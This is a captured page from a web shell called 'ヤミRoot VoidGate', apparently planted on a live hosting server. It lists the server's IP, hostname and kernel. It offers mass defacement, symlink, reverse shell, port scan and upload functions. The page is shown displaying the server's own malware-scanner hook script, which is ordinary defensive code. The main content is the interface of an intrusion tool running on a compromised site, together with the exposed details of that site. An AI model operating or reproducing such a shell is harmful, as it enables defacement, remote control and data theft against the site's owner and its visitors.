ヤミRoot VoidGate
User / IP
:
216.73.216.49
Host / Server
:
146.88.233.70 / www.dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
usr
/
local
/
maldetect
/
Viewing: hookscan.sh
#!/usr/bin/env bash file="$1" inspath='/usr/local/maldetect' intcnf="$inspath/internals/internals.conf" if [ -f "$intcnf" ]; then source $intcnf fi ## these values can be overridden in conf.maldet.hookscan quarantine_hits=1 quarantine_clean=0 scan_tmpdir_paths='' hscan=1 isclamd=`pidof clamd 2> /dev/null` if [ "$isclamd" ] && [ -f "$clamdscan" ]; then clamd_scan=1 else clamd_scan=0 fi hookcnf="$inspath/conf.maldet.hookscan" if [ -f "$hookcnf" ]; then source $hookcnf fi cd /tmp ; $inspath/maldet --hook-scan --config-option quarantine_hits=$quarantine_hits,quarantine_clean=$quarantine_clean,tmpdir=/var/tmp,scan_tmpdir_paths=$scan_tmpdir_paths,scan_clamscan=$clamd_scan -a "$file"
Coded With 💗 by
0x6ick